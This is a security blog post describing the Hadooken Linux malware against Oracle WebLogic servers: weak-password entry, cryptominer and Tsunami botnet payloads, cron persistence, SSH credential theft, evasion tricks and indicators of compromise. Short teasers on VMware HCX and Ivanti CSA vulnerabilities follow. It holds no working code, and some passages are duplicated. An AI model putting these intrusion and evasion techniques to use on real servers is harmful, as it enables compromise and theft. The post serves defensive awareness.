Hadooken: New Linux Malware Exploiting Oracle WebLogic Servers

Hadooken: New Linux Malware Exploiting Oracle WebLogic Servers

Introduction

In the ever-evolving landscape of cybersecurity threats, a new player has emerged: Hadooken. This Linux malware specifically targets Oracle WebLogic servers, which are widely used for running critical applications in enterprises. Let’s dive into the details.

What Is Hadooken?

    Attack Vector: Hadooken gains unauthorized access to WebLogic servers by exploiting weak passwords. Once inside, it remotely executes malicious code.

    Attack flow (Source – Aquasec)

    Payload Components:

    • A shell script named “c”
    • A Python script called “y”

    Cryptominer and DDoS Botnet

    Hadooken doesn’t stop at infiltration. It includes:
    • A cryptominer: Hijacking server resources for cryptocurrency mining.
    • The Tsunami malware: A DDoS botnet and backdoor, giving attackers full control.

    Persistence and Lateral Movement

    • Hadooken ensures persistence by creating cron jobs. It can steal user credentials, allowing lateral movement within networks. But there’s more:
    Persistence and Lateral Movement
    Hadooken ensures persistence by creating cron jobs. It can steal user credentials, allowing lateral movement within networks. But there’s more:

    Lateral Movement Techniques
    • Hadooken actively searches for SSH data in various directories. This allows it to move laterally within the network, potentially compromising other servers.
    • To evade detection, the malware employs several techniques:
      • Base64 Encoding: By encoding its communication or payloads in base64, Hadooken obscures its intentions.
      • Log Clearance: It attempts to erase traces of its activities by clearing logs.
      • Process Masquerading: Hadooken disguises itself as legitimate processes, making it harder to spot.
    Indicators of Compromise (IOCs)
    • Associated IP addresses 89.185.85.102 and 185.174.136.204 link to potential ransomware distribution. Specifically:
      • Mallox MD5: 4a12098c3799ce17d6d59df86ed1a5b6
      • RHOMBUS
      • NoEscape
    Attack flow (Source – Aquasec)

    Multi-Platform Attack Strategy
    • A related PowerShell script named ‘b.ps1’ (MD5: c1897ea9457343bd8e73f98a1d85a38f) is involved in distributing the Mallox ransomware. This indicates a multi-platform attack approach.
    WebLogic Servers at Risk
    • Shodan reveals over 230,000 internet-connected WebLogic servers with several hundred exposed admin consoles vulnerable to exploitation.

    Potential Ransomware Connection

    • Hadooken’s binary hints at links to RHOMBUS and NoEscape ransomware strains.
    • The threat actors seem to target both Windows endpoints and Linux servers.
    MITRE ATT&CK® Framework
    !MITRE ATT&CK Framework
    Attack flow (Source – Aquasec)
    • The MITRE ATT&CK framework serves as a comprehensive compendium of adversary tactics, techniques, and procedures (TTPs) employed throughout the intrusion lifecycle.
    • Use the image to illustrate specific tactics or techniques discussed in this post.

    Street Fighter Reference

    • The name “Hadooken” pays homage to the iconic attack move from the Street Fighter video game series.

    Conclusion

    Stay vigilant! Regularly update passwords, monitor for suspicious activity, and follow best practices to protect your servers.

    Comments

    Post a Comment

    Popular posts from this blog

    Critical VMware HCX Vulnerability: What You Need to Know

    Image
    Critical VMware HCX Vulnerability: What You Need to Know (Image by  Shah Sheikh ) In a recent security advisory, VMware disclosed a critical vulnerability in its Hybrid Cloud Extension (HCX) platform. This vulnerability, identified as CVE-2024-38814, poses a significant threat to organizations using HCX for application mobility and workload migration across data centers and clouds. The Vulnerability The VMware HCX vulnerability is a form of SQL injection that allows authenticated users with non-administrator privileges to execute remote code on the HCX manager. With a CVSS score of 8.8, this high-severity vulnerability can be exploited by inserting malicious SQL queries into the HCX system, potentially granting attackers unauthorized access and control. Affected Versions VMware HCX 4.8.x VMware HCX 4.9.x VMware HCX 4.10.x Mitigation Steps To mitigate this vulnerability, VMware has released patches for the affected versions: HCX 4.8.3 HCX 4.9.2 HCX 4.10.1 Organizations using these v...
    Read more

    CVE-2024-8190: An OS Command Injection Vulnerability in Ivanti CSA: What You Need to Know

    Image
    Overview: CVE-2024-8190 is an OS command injection vulnerability found in Ivanti Cloud Services Appliance (CSA) versions 4.6 (before Patch 519) and earlier. The flaw allows a remote authenticated attacker with admin-level privileges to execute arbitrary code on the affected system. Attack Scenario: The attacker must first log into the CSA’s admin login page. While this initial login may seem like a hurdle, it’s not insurmountable in some cases. Dual-homed CSA configurations (where eth0 serves as an internal network) are less vulnerable, as recommended by Ivanti. However, not everyone follows these best practices. Users who accidentally misconfigure interfaces or have weak passwords are at risk. For instance, if an admin swaps the interfaces or configures only one interface, the CSA console could be exposed to the internet. Default login credentials (username: admin, password: admin) should be changed upon initial login. However, weak passwords and the lack of rate limiting for login at...
    Read more